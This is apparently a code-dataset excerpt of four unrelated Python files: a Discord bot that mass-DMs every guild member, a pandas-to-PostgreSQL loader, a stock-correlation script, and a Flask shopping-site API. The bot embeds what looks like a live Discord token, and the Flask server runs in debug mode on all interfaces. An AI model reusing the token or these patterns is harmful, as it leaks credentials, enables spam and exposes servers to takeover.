channelz in guild.members:\n \n try:\n channel2 = await channelz.create_dm()\n await channel2.send(message)\n su = su + 1\n except:\n fa = fa + 1\n pass\n try:\n sul = sul + 1\n sui = user[sul]\n print(sui)\n msg1 = '> 메시지를 전송중입니다. \\n > 전송중인 유저 : {0} \\n > {1}명에게 메시지가 전송되었습니다\\n > {2}명에게 메시지가 전송되지 않았습니다.'.format(sui,su,fa)\n await msg.edit(content=msg1)\n except:\n pass\n msg2 = '> 메시지 전송이 완료되었습니다. \\n > 총 {0}명에게 메시지가 전송되었으며\\n > {1}명에게 메시지가 전송되지 않았습니다.'.format(su,fa)\n await msg.edit(content=msg2)\n else:\n await ctx.channel.send('[Error] 등록된 사용자가 아닙니다.')\nt = 'NjgxMzA2NjI4NzY2OTU3NTc2.XlNGUg.xayXw8PM1KKct7KC1WZMu7pBAc0'\nclient.run(t)\n\n", "sub_path": "build.py", "file_name": "build.py", "file_ext": "py", "file_size_in_byte": 1858, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "discord.ext.commands.Bot", "line_number": 4, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 4, "usage_type": "name"}]} {"seq_id": "585934934", "text": "import pandas as pd \nfrom postgresql import pgConnect, pgEngine\n\ndf = pd.read_csv('global_superstore.csv')\nprint(df.head())\n\n# Initiate PostgreSQL connection to DB\nconn = pgConnect()\ncur = conn.cursor()\n\n# PostgreSQL connection doesn't work with Pandas so have initiated this engine as well with SQLAlchemy\nengine = pgEngine()\n\ndf.to_sql('global_superstore',engine, schema='prototyping',if_exists='replace')\nprint('Successfully loaded data')", "sub_path": "load_file.py", "file_name": "load_file.py", "file_ext": "py", "file_size_in_byte": 441, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "pandas.read_csv", "line_number": 4, "usage_type": "call"}, {"api_name": "postgresql.pgConnect", "line_number": 8, "usage_type": "call"}, {"api_name": "postgresql.pgEngine", "line_number": 12, "usage_type": "call"}]} {"seq_id": "135642264", "text": "from Common.TradingDay import TradingDay\nfrom Common.OracleConnector import OracleConnector\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime\n\n\nclass marketdata(object):\n def __init__(self, startdate):\n # get trading days\n td = TradingDay()\n enddate = td.getLastTradingDay()\n self.tradedays = 
td.getDuration(startdate, enddate)\n\n # get stock list\n oc = OracleConnector()\n self.connection = oc.getConn()\n sqls_stocklist = \"select F16_1090,OB_OBJECT_NAME_1090,F23_1090,F27_1090 from WIND.TB_OBJECT_1090 where F4_1090='A'and F19_1090='0' and F21_1090='1' order by F16_1090 asc\"\n self.df_stocklist = pd.read_sql(sql=sqls_stocklist, con=self.connection)\n\n def getMarketData(self, count):\n stocklist = self.df_stocklist['F16_1090']\n df_price = pd.DataFrame()\n df_price['TRADE_DT'] = self.tradedays\n # print(df_price)\n\n for stock in stocklist[:count]:\n print(stock)\n sqls = \"\"\"select F2_1425,F4_1425,F5_1425,F6_1425,F7_1425,F8_1425,F9_1425 from WIND.TB_OBJECT_1425, WIND.TB_OBJECT_1090 where F1_1425=F2_1090 and f16_1090 ='%s'and F2_1425> '20190101' and F4_1090= 'A' order by F2_1425 asc\"\"\" \\\n % stock\n df_stock = pd.read_sql(sql=sqls, con=self.connection)\n stock_temp = '%s' % stock\n df_price[stock_temp] = df_stock['F4_1425']\n\n # df_price.to_csv('D:\\\\app\\\\test.csv', sep=',', header=True, index=True)\n print(df_price)\n\n\nclass calculation(object):\n def __init__(self):\n pass\n\n def closeprice(self,k1,k2,k3,decay,combo,k0):\n # df = pd.read_csv('D:\\\\app\\\\matlab_comparison\\\\close.csv')\n df = pd.read_csv('/home/PerformanceAnalysis/Performance/AccountMonitor/Others/close.csv')\n # print(df)\n matrix = df.as_matrix()\n size = np.shape(matrix)\n [rows, cols] = size\n matrix_temp = np.zeros(size)\n # print(matrix_temp)\n\n tic = datetime.now()\n for i in range(cols):\n for j in range(rows-k0, rows):\n x1 = matrix[j - k1 + 1:j + 1, i]\n x2 = matrix[j - k2 - k1 + 1:j - k2 + 1, i]\n x3 = matrix[j - k3 - k1 + 1:j - k3 + 1, i]\n y1 = x1 / x2\n y2 = x1 / x3\n # print(x1, x2, x3)\n\n corr = np.corrcoef(y1, y2)\n # print(corr)\n\n matrix_temp[j, i] = -corr[0][1]\n print(matrix_temp)\n toc = datetime.now()\n print('Processing time: %f seconds' % (toc - tic).total_seconds())\n\nif __name__ == '__main__':\n # startdate = '20190102'\n # mkt = marketdata(startdate)\n # mkt.getMarketData(100)\n\n cal = calculation()\n cal.closeprice(5, 1, 13, 1, 1, 1422)\n", "sub_path": "Others/testets.py", "file_name": "testets.py", "file_ext": "py", "file_size_in_byte": 2789, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "Common.TradingDay.TradingDay", "line_number": 11, "usage_type": "call"}, {"api_name": "Common.OracleConnector.OracleConnector", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 23, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 31, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 50, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 53, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 53, "usage_type": "name"}, {"api_name": "numpy.corrcoef", "line_number": 63, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 68, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 68, "usage_type": "name"}]} {"seq_id": "402705504", "text": "from json import dumps\nfrom flask import Flask, request\nfrom flask_cors import CORS\nfrom auth import *\nfrom app import *\nfrom auth_admin import *\nfrom product import *\nfrom 
user_function import *\nfrom purchase import *\nfrom cart import *\nfrom recommend import *\nfrom search import *\nfrom chat import *\n#----------------------------------------------user login-------------------------------\n@app.route('/login', methods=['POST'])\ndef flask_login():\n j = request.json\n email = j['email']\n password = j['password']\n l = user_login(email, password)\n return dumps(l)\n\n\n@app.route('/register', methods=['POST'])\ndef flask_register():\n j = request.json\n email = j['email']\n password = j['password']\n name = j['name']\n l = user_register(email, password, name)\n return dumps(l)\n\n\n@app.route('/logout', methods=['POST'])\ndef flask_logout():\n j = request.json\n t = j['token']\n l = user_logout(t)\n return dumps(l)\n\n#----------------------------------------------admin login-------------------------------\n@app.route('/admin_login', methods=['POST'])\ndef flask_admin_login():\n j = request.json\n email = j['email']\n password = j['password']\n l = admin_login(email, password)\n return dumps(l)\n\n@app.route('/admin_logout', methods=['POST'])\ndef flask_admin_logout():\n j = request.json\n token = j['Admin']\n l = admin_logout(token)\n return dumps(l)\n\n@app.route('/admin_product', methods=['GET'])\ndef flask_admin_product():\n token = request.headers.get('Admin',None)\n l = admin_product(token)\n return dumps(l)\n\n@app.route('/admin_order', methods=['GET'])\ndef flask_admin_order():\n token = request.headers.get('Admin',None)\n l = admin_order(token)\n return dumps(l)\n\n\n@app.route('/admin_get_order', methods=['GET'])\ndef flask_admin_get_order():\n token = request.headers.get('Admin',None)\n index = request.headers.get('index',None)\n l=admin_get_order(token,index)\n return dumps(l)\n\n#----------------------------------------------product-------------------------------\n\n \n@app.route('/add_product', methods=['POST'])\ndef flask_add_product():\n j = request.json\n token = request.headers.get('Admin',None)\n category_id = j['category_id']\n name = j['name']\n detail = j['detail']\n price = j['price']\n stock = j['stock']\n tag=j['tag']\n first_p=j['first_p']\n second_p=j['second_p']\n l = add_product(token,category_id,name,detail,price,stock,tag,first_p,second_p)\n return dumps(l)\n\n@app.route('/delete_product/', methods=['PUT'])\ndef flask_delete_product(id):\n id=int(id)\n token = request.headers.get('Authorization',None)\n l=delete_product(token,id)\n return dumps(l)\n\n@app.route('/update_information', methods=['POST'])\ndef flask_update_information():\n j = request.json\n token = request.headers.get('Admin',None)\n id=j['id']\n category_id = j['category_id']\n name = j['name']\n detail = j['detail']\n price = j['price']\n stock = j['stock']\n tag=j['tag']\n first_p=j['first_p']\n second_p=j['second_p']\n l = update_information(token,id,category_id,name,detail,price,stock,tag,first_p,second_p)\n return dumps(l)\n\n\n@app.route('/change_detail', methods=['PUT'])\ndef flask_change_detail():\n j = request.json\n token = request.args.get(\"token\")\n id = request.args.get(\"id\")\n detail = j['detail']\n l = chang_detail(token, id, detail)\n return dumps(l)\n\n@app.route('/add_tag', methods=['PUT'])\ndef flask_add_tag():\n j = request.json\n token = request.args.get(\"token\")\n id = request.args.get(\"id\")\n tag = j['tag']\n l = add_tag(token, id, tag)\n return dumps(l)\n\n@app.route('/change_tag', methods=['PUT'])\ndef flask_change_tag():\n j = request.json\n token = request.args.get(\"token\")\n id = request.args.get(\"id\")\n tag = 
j['tag']\n    l = change_tag(token, id, tag)\n    return dumps(l)\n\n@app.route('/change_status', methods=['PUT'])\ndef flask_change_status():\n    j = request.json\n    token = request.args.get(\"token\")\n    id = request.args.get(\"id\")\n    status = j['status']\n    l = change_status(token, id, status)\n    return dumps(l)\n\n@app.route('/change_stock', methods=['PUT'])\ndef flask_change_stock():\n    j = request.json\n    token = request.args.get(\"token\")\n    id = request.args.get(\"id\")\n    stock= j['stock']\n    l = change_stock(token, id, stock)\n    return dumps(l)\n\n@app.route('/change_price', methods=['PUT'])\ndef flask_change_price():\n    j = request.json\n    token = request.args.get(\"token\")\n    id = request.args.get(\"id\")\n    price = j['price']\n    l = change_price(token, id, price)\n    return dumps(l)\n\n@app.route('/get_product/<category>', methods=['GET'])\ndef flask_get_product(category):\n    return dumps(get_by_category(category))\n\n@app.route('/get_number/<category>', methods=['GET'])\ndef flask_get_number(category):\n    return dumps(get_number_by_category(category))\n\n@app.route('/get_one_product/<id>', methods=['GET'])\ndef flask_get_one_product(id):\n    id=int(id)\n    return dumps(get_one_product(id))\n\n\n@app.route('/update_first_photo', methods=['PUT'])\ndef flask_update_first_photo():\n    j = request.json\n    id = request.args.get(\"id\")\n    token = request.args.get(\"token\")\n    photo = j['photo']\n    return dumps(update_first_photo(photo))\n\n@app.route('/update_second_photo', methods=['PUT'])\ndef flask_update_second_photo():\n    j = request.json\n    id = request.args.get(\"id\")\n    token = request.args.get(\"token\")\n    photo = j['photo']\n    return dumps(update_second_photo(photo))\n#----------------------------------------------user function-------------------------------\n\n@app.route('/change_password', methods=['PUT'])\ndef flask_change_password():\n    j = request.json\n    token = request.headers.get('Authorization',None)\n    password = j['password']\n    current_password = j['current_password']\n    l = change_password(token,current_password, password)\n    return dumps(l)\n\n\n@app.route('/change_name', methods=['PUT'])\ndef flask_change_name():\n    j = request.json\n    token = request.headers.get('Authorization',None)\n    name = j['name']\n    l = change_name(token,name)\n    return dumps(l)\n\n\n#----------------------------------------------purchase-------------------------------\n\n\n@app.route('/purchase_product', methods=['POST'])\ndef flask_purchase_product():\n    token = request.headers.get('Authorization',None)\n    l = purchase_product(token)\n    return dumps(l)\n\n@app.route('/review_By_time', methods=['POST'])\ndef flask_review_By_time():\n    j = request.json\n    token = request.args.get(\"token\")\n    day = request.args.get(\"day\")\n    l = review_By_time(token,day)\n    return dumps(l)\n\n@app.route('/get_cost_By_Time', methods=['POST'])\ndef flask_get_cost_By_Time():\n    j = request.json\n    token = request.args.get(\"token\")\n    day = request.args.get(\"day\")\n    l = get_cost_By_Time(token,day)\n    return dumps(l)\n\n@app.route('/get_record', methods=['GET'])\ndef flask_get_record():\n    token = request.headers.get('Authorization',None)\n    l = get_record(token)\n    return dumps(l)\n#----------------------------------------------cart-------------------------------\n\n@app.route('/add_product_to_cart/<id>', methods=['GET'])\ndef flask_add_product_to_cart(id):\n    token = request.headers.get('Authorization',None)\n    id=int(id)\n    l = add_product_to_cart(token,id)\n    return dumps(l)\n\n@app.route('/remove_product_from_cart/<id>', methods=['DELETE'])\ndef flask_remove_product_from_cart(id):\n    token 
= request.headers.get('Authorization',None)\n    id=int(id)\n    l = remove_product_from_cart(token,id)\n    return dumps(l)\n\n@app.route('/get_cart', methods=['GET'])\ndef flask_get_cart():\n    token = request.headers.get('Authorization',None)\n    l = get_cart(token)\n    return dumps(l)\n\n\n\n#----------------------------------------------recommend-------------------------------\n\n@app.route('/random_recommend', methods=['GET'])\ndef flask_random_recommend():\n    number = request.headers.get('Numbers',None)\n    number = int(number)\n    l=random_recommendation(number) # return 10 product\n    return dumps(l)\n\n@app.route('/product_recommendation/<id>', methods=['GET'])\ndef flask_product_recommendation(id):\n    id=int(id)\n    number = request.headers.get('Numbers',None)\n    l=product_recommendation(id,number) # return 10 product\n    return dumps(l)\n\n\n@app.route('/buy_recommendation/<id>', methods=['GET'])\ndef flask_buy_recommendation(id):\n    id=int(id)\n    number = request.headers.get('Numbers',None)\n    l=buy_recommendation(id,number) # return 10 product\n    return dumps(l)\n\n@app.route('/purchase_record_recommendation', methods=['GET'])\ndef flask_purchase_record_recommendation():\n    token = request.headers.get('Authorization',None)\n    number = request.headers.get('Numbers',None)\n    number = int(number)\n    l=purchase_record_recommendation(token,number) # return 10 product\n    return dumps(l)\n\n#-----------------------------------------------search------------------------------------\n@app.route('/search', methods=['GET'])\ndef flask_search():\n    search_word = request.headers.get('search_word',None)\n    max_price = int(request.headers.get('max_price',None))\n    min_price = int(request.headers.get('min_price',None))\n    l = search(search_word,min_price,max_price)\n    return dumps(l)\n\n@app.route('/search_with_token', methods=['GET'])\ndef flask_search_with_token():\n    token = request.headers.get('Authorization',None)\n    search_word = request.headers.get('search_word',None)\n    max_price = request.headers.get('max_price',None)\n    min_price = request.headers.get('min_price',None)\n    l = search_with_token(token,search_word,min_price,max_price)\n    return dumps(l)\n\n\n#-------------------------------------------chatbot-----------------------------\n'''\n@app.route('/chatbot', methods=['GET'])\ndef flask_chatbot():\n    j = request.json\n    word=j['word']\n    l=chatbot_handle(word)\n    return dumps(l)\n'''\n@app.route('/chatbot', methods=['GET'])\ndef flask_chatbot():\n    word = request.headers.get('word',None)\n    l=chatbot_handle(word)\n    return dumps(l)\n\n@app.route('/chatbot_get', methods=['GET'])\ndef flask_chatbot_get():\n    l=load_chatDB()\n    return dumps(l)\n\nif __name__ == '__main__':\n    app.run('0.0.0.0', port=5000,debug=True)\n", "sub_path": "RecommendWebsite/reed/Flask_all.py", "file_name": "Flask_all.py", "file_ext": "py", "file_size_in_byte": 10244, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "flask.request.json", "line_number": 17, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 17, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 21, "usage_type": "call"}, {"api_name": "app.route", "line_number": 15, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 26, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 26, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 31, "usage_type": "call"}, {"api_name": "app.route", "line_number": 24, "usage_type": "call"}, {"api_name": 
"flask.request.json", "line_number": 36, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 36, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 39, "usage_type": "call"}, {"api_name": "app.route", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 44, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 44, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 48, "usage_type": "call"}, {"api_name": "app.route", "line_number": 42, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 52, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 52, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 55, "usage_type": "call"}, {"api_name": "app.route", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 59, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 59, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 59, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 61, "usage_type": "call"}, {"api_name": "app.route", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 65, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 65, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 67, "usage_type": "call"}, {"api_name": "app.route", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 72, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 72, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 72, "usage_type": "name"}, {"api_name": "flask.request.headers.get", "line_number": 73, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 73, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 73, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 75, "usage_type": "call"}, {"api_name": "app.route", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 82, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 82, "usage_type": "name"}, {"api_name": "flask.request.headers.get", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 83, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 83, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 93, "usage_type": "call"}, {"api_name": "app.route", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 98, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 98, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 98, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 100, "usage_type": "call"}, {"api_name": "app.route", "line_number": 95, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 104, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 104, "usage_type": "name"}, {"api_name": "flask.request.headers.get", "line_number": 105, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 105, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 105, "usage_type": "name"}, 
{"api_name": "json.dumps", "line_number": 116, "usage_type": "call"}, {"api_name": "app.route", "line_number": 102, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 121, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 121, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 122, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 122, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 122, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 123, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 123, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 123, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 126, "usage_type": "call"}, {"api_name": "app.route", "line_number": 119, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 130, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 130, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 131, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 131, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 131, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 132, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 132, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 132, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 135, "usage_type": "call"}, {"api_name": "app.route", "line_number": 128, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 139, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 139, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 140, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 140, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 140, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 141, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 141, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 141, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 144, "usage_type": "call"}, {"api_name": "app.route", "line_number": 137, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 148, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 148, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 149, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 149, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 149, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 150, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 150, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 150, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 153, "usage_type": "call"}, {"api_name": "app.route", "line_number": 146, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 157, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 157, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 158, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 158, "usage_type": "attribute"}, 
{"api_name": "flask.request", "line_number": 158, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 159, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 159, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 159, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 162, "usage_type": "call"}, {"api_name": "app.route", "line_number": 155, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 166, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 166, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 167, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 167, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 167, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 168, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 168, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 168, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 171, "usage_type": "call"}, {"api_name": "app.route", "line_number": 164, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 175, "usage_type": "call"}, {"api_name": "app.route", "line_number": 173, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 179, "usage_type": "call"}, {"api_name": "app.route", "line_number": 177, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 184, "usage_type": "call"}, {"api_name": "app.route", "line_number": 181, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 189, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 189, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 190, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 190, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 190, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 191, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 191, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 191, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 193, "usage_type": "call"}, {"api_name": "app.route", "line_number": 187, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 197, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 197, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 198, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 198, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 198, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 199, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 199, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 199, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 201, "usage_type": "call"}, {"api_name": "app.route", "line_number": 195, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 206, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 206, "usage_type": "name"}, {"api_name": "flask.request.headers.get", "line_number": 207, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 207, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 
207, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 211, "usage_type": "call"}, {"api_name": "app.route", "line_number": 204, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 216, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 216, "usage_type": "name"}, {"api_name": "flask.request.headers.get", "line_number": 217, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 217, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 217, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 220, "usage_type": "call"}, {"api_name": "app.route", "line_number": 214, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 228, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 228, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 228, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 230, "usage_type": "call"}, {"api_name": "app.route", "line_number": 226, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 234, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 234, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 235, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 235, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 235, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 236, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 236, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 236, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 238, "usage_type": "call"}, {"api_name": "app.route", "line_number": 232, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 242, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 242, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 243, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 243, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 243, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 244, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 244, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 244, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 246, "usage_type": "call"}, {"api_name": "app.route", "line_number": 240, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 250, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 250, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 250, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 252, "usage_type": "call"}, {"api_name": "app.route", "line_number": 248, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 257, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 257, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 257, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 260, "usage_type": "call"}, {"api_name": "app.route", "line_number": 255, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 264, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 264, "usage_type": 
"attribute"}, {"api_name": "flask.request", "line_number": 264, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 267, "usage_type": "call"}, {"api_name": "app.route", "line_number": 262, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 271, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 271, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 271, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 273, "usage_type": "call"}, {"api_name": "app.route", "line_number": 269, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 281, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 281, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 281, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 284, "usage_type": "call"}, {"api_name": "app.route", "line_number": 279, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 289, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 289, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 289, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 291, "usage_type": "call"}, {"api_name": "app.route", "line_number": 286, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 297, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 297, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 297, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 299, "usage_type": "call"}, {"api_name": "app.route", "line_number": 294, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 303, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 303, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 303, "usage_type": "name"}, {"api_name": "flask.request.headers.get", "line_number": 304, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 304, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 304, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 307, "usage_type": "call"}, {"api_name": "app.route", "line_number": 301, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 312, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 312, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 312, "usage_type": "name"}, {"api_name": "flask.request.headers.get", "line_number": 313, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 313, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 313, "usage_type": "name"}, {"api_name": 